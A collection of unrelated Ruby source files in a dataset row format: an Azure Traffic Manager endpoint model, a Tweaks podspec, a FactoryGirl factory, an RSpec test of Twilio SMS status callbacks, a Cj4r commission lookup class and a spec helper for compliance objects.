# Possible values include: 'CheckingEndpoint', 'Online', 'Degraded',
# 'Disabled', 'Inactive', 'Stopped'
attr_accessor :endpoint_monitor_status
# @return [Integer] The minimum number of endpoints that must be
# available in the child profile in order for the parent profile to be
# considered available. Only applicable to endpoint of type
# 'NestedEndpoints'.
attr_accessor :min_child_endpoints
# @return [Array<String>] The list of countries/regions mapped to this
# endpoint when using the ‘Geographic’ traffic routing method. Please
# consult Traffic Manager Geographic documentation for a full list of
# accepted values.
attr_accessor :geo_mapping
#
# Mapper for Endpoint class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'Endpoint',
type: {
name: 'Composite',
class_name: 'Endpoint',
model_properties: {
id: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'id',
type: {
name: 'String'
}
},
name: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'name',
type: {
name: 'String'
}
},
type: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'type',
type: {
name: 'String'
}
},
target_resource_id: {
client_side_validation: true,
required: false,
serialized_name: 'properties.targetResourceId',
type: {
name: 'String'
}
},
target: {
client_side_validation: true,
required: false,
serialized_name: 'properties.target',
type: {
name: 'String'
}
},
endpoint_status: {
client_side_validation: true,
required: false,
serialized_name: 'properties.endpointStatus',
type: {
name: 'String'
}
},
weight: {
client_side_validation: true,
required: false,
serialized_name: 'properties.weight',
type: {
name: 'Number'
}
},
priority: {
client_side_validation: true,
required: false,
serialized_name: 'properties.priority',
type: {
name: 'Number'
}
},
endpoint_location: {
client_side_validation: true,
required: false,
serialized_name: 'properties.endpointLocation',
type: {
name: 'String'
}
},
endpoint_monitor_status: {
client_side_validation: true,
required: false,
serialized_name: 'properties.endpointMonitorStatus',
type: {
name: 'String'
}
},
min_child_endpoints: {
client_side_validation: true,
required: false,
serialized_name: 'properties.minChildEndpoints',
type: {
name: 'Number'
}
},
geo_mapping: {
client_side_validation: true,
required: false,
serialized_name: 'properties.geoMapping',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'StringElementType',
type: {
name: 'String'
}
}
}
}
}
}
}
end
end
end
end
| 34.269841 | 79 | 0.515825 |
799a602ed66d46e73d5913c53e40c84135cb673c | 662 | Pod::Spec.new do |spec|
spec.name = 'Tweaks'
spec.version = '1.1.0'
spec.license = { :type => 'BSD' }
spec.homepage = 'https://github.com/facebook/Tweaks'
spec.authors = { 'Grant Paul' => '[email protected]', 'Kimon Tsinteris' => '[email protected]' }
spec.summary = 'Easily adjust parameters for iOS apps in development.'
spec.source = { :git => 'https://github.com/facebook/Tweaks.git', :tag => '1.1.0' }
spec.source_files = 'FBTweak/*.{h,m}'
spec.requires_arc = true
spec.social_media_url = 'https://twitter.com/fbOpenSource'
spec.framework = 'MessageUI'
spec.ios.deployment_target = '6.0'
end
| 41.375 | 102 | 0.625378 |
bfedb6757399ab10fc01b09d7874485e6deb5f93 | 607 | # Copyright (c) Universidade Federal Fluminense (UFF).
# This file is part of SAPOS. Please, consult the license terms in the LICENSE file.
# Read about factories at https://github.com/thoughtbot/factory_girl
FactoryGirl.define do
factory :accomplishment do
phase
enrollment
after_build do |obj|
if obj.phase.levels.empty?
level = FactoryGirl.create(:level)
phase_duration = FactoryGirl.create(:phase_duration, :level => level, :phase => obj.phase)
else
level = obj.phase.levels.first
end
obj.enrollment.level = level
end
end
end
| 27.590909 | 98 | 0.68369 |
1166f38962ea5801e26e168b03c10ae19aeea386 | 2,028 | require 'rails_helper'
feature 'Twilio' do
let(:message_params) { twilio_new_message_params }
let(:status_params) { twilio_status_update_params from_number: message_params['From'], sms_sid: message_params['SmsSid'] }
before do
userone = create :user
clientone = create :client, user: userone, phone_number: message_params['From']
rr = ReportingRelationship.find_by(user: userone, client: clientone)
create :text_message, reporting_relationship: rr, twilio_sid: message_params['SmsSid'], twilio_status: 'queued'
end
after do
twilio_clear_after
end
describe 'POSTs to #incoming_sms_status' do
context 'with incorrect signature' do
it 'returns a forbidden response' do
# send false as 2nd argument to send bad signature
twilio_post_sms_status status_params, false
expect(page).to have_http_status(:forbidden)
end
end
context 'with correct signature' do
it 'returns a no content response' do
twilio_post_sms_status status_params
expect(page).to have_http_status(:no_content)
end
end
context 'many requests at once', :js do
let(:user) { create :user }
let(:client) { create :client, user: user }
let(:rr) { ReportingRelationship.find_by(user: user, client: client) }
before do
visit root_path
end
it 'handles it' do
message = create :text_message, reporting_relationship: rr, inbound: false, twilio_status: 'queued'
threads = %w[first second third fourth].each_with_index.map do |status, i|
Thread.new do
status_params = twilio_status_update_params(
to_number: message.number_to,
sms_sid: message.twilio_sid,
sms_status: status
)
twilio_post_sms_status status_params, true, 'X-Request-Start' => "151752434924#{i}"
end
end
threads.map(&:join)
expect(message.reload.twilio_status).to eq 'fourth'
end
end
end
end
| 31.6875 | 124 | 0.667653 |
91282fca0a88149bd3dbeba070d593913b1a8567 | 1,929 | require 'cj4r/drivers/daily_publisher_commission_driver'
module Cj4r
class DailyPublisherCommission
class << self # Class methods
def find(*args)
options = args.extract_options!
options[:developer_key] ||= Cj4r.config[:developer_key]
options[:date] = options[:date].nil? ? 1.day.ago.strftime("%m/%d/%Y") : options[:date].strftime("%m/%d/%Y")
options[:date_type] ||= 'event'
options[:advertiser_ids] ||= ''
options[:website_ids] ||= ''
options[:action_status] ||= ''
options[:action_types] ||= ''
options[:ad_ids] ||= ''
options[:countries] ||= ''
options[:correction_status] ||= ''
options[:sort_by] ||= 'postingDate'
options[:sort_order] ||= 'desc'
case args.first
when :first then find_initial(options)
when :last then find_last(options)
when :all then find_every(options)
else find_every(options)
end
end
private
def find_initial(options)
find_every(options).first
end
def find_last(options)
find_every(options).last
end
def find_every(options)
params = FindPublisherCommissions.new(
options[:developer_key],
options[:date],
options[:date_type],
options[:advertiser_ids],
options[:website_ids],
options[:action_status],
options[:action_types],
options[:ad_ids],
options[:countries],
options[:correction_status],
options[:sort_by],
options[:sort_order])
service.findPublisherCommissions(params).out.publisherCommissions
end
def service
@service ||= PublisherCommissionServicePortType.new
end
end
end
end | 31.112903 | 130 | 0.554692 |
f7e789362c317c60c0fed994910d709e99965b2b | 187 | class CreateWeixinimgs < ActiveRecord::Migration[5.1]
def change
create_table :weixinimgs do |t|
t.references :weixin, foreign_key: true
t.timestamps
end
end
end
| 18.7 | 53 | 0.695187 |
5d98a1d601eaf627f71b3dfd4bb60a2e39a55c3f | 1,467 | # frozen_string_literal: true
require 'spec_helper'
shared_examples 'a method to squash a hash' do |joiner = '.'|
let(:hash) { { a: { b: 1, c: { d: 2 } } } }
context 'with hash values' do
let(:key1) { %w[a b].join(joiner) }
let(:key2) { %w[a c d].join(joiner) }
it 'flattens the hash' do
expect(squashed).to eq(key1 => 1, key2 => 2)
end
it { expect { hash.squash }.not_to(change { hash }) }
end
context 'with simple array value' do
let(:hash) do
{
'person' => %w[John Wick]
}
end
it 'squash also hash' do
expect(squashed).to eq(
'person[0]' => 'John',
'person[1]' => 'Wick'
)
end
end
context 'with array containing hashes' do
let(:hash) { { a: { b: [1, { x: 3, y: { z: 4 } }] } } }
let(:key) { %w[a b].join(joiner) }
let(:expected) do
{
"#{key}[0]" => 1,
"#{key}[1]#{joiner}x" => 3,
"#{key}[1]#{joiner}y#{joiner}z" => 4
}
end
it 'flattens the hash' do
expect(squashed).to eq(expected)
end
end
context 'with array containing arrays' do
let(:hash) { { a: { b: [[11, 12], [21, 22]] } } }
let(:key) { %w[a b].join(joiner) }
let(:expected) do
{
"#{key}[0][0]" => 11,
"#{key}[0][1]" => 12,
"#{key}[1][0]" => 21,
"#{key}[1][1]" => 22
}
end
it 'flattens the hash' do
expect(squashed).to eq(expected)
end
end
end
| 21.26087 | 61 | 0.483299 |
e8d65769366db596444462dd5f9f3530b9911b50 | 2,045 | module BaseObjects
def create_base_objects
@prog = FactoryGirl.create(:program, :title => 'Program')
@opt_reg = FactoryGirl.create(:option, :title => 'Regulation', :role => 'directive_kind')
@opt_com = FactoryGirl.create(:option, :title => 'Company Policy', :role => 'directive_kind')
@creg = FactoryGirl.create(:directive, :title => 'Company', :slug => 'COM1', :kind => @opt_com)
@reg = FactoryGirl.create(:directive, :title => 'Reg 1', :slug => 'REG1', :kind => @opt_reg)
@ctl = FactoryGirl.create(:control, :title => 'Control 1', :slug => 'REG1-CTL1', :description => 'x', :directive => @reg)
@cycle = FactoryGirl.create(:cycle, :program=> @prog, :start_at => '2011-01-01')
@sec = FactoryGirl.create(:section, :title => 'Section 1', :slug => 'REG1-SEC1', :description => 'x', :directive => @reg)
@sys = FactoryGirl.create(:system, :title => 'System 1', :slug => 'SYS1', :description => 'x', :infrastructure => true)
@sc = FactoryGirl.create(:system_control, :control => @ctl, :system => @sys, :cycle => @cycle, :state => :green)
@doc = FactoryGirl.create(:document, :link => 'http://cde.com/', :title => 'Cde')
@person1 = FactoryGirl.create(:person, :email => '[email protected]')
end
def test_controller_index(assign, objs)
get 'index'
response.should be_success
assigns(assign).should eq(objs)
end
def test_controller_create(assign, params)
post 'create', assign => params
response.should be_redirect
result = assigns(assign)
result.changed?.should be_false
params.each do |key, value|
result.send(key).should eq(value)
end
end
def test_controller_update(assign, obj, params)
put 'update', :id => obj.id, assign => params
response.should be_redirect
result = assigns(assign)
result.should eq(obj)
result.changed?.should be_false
params.each do |key, value|
result.send(key).should eq(value)
end
end
def test_unauth
login({}, {})
get 'index'
response.should be_unauthorized
end
end
| 40.9 | 125 | 0.649389 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.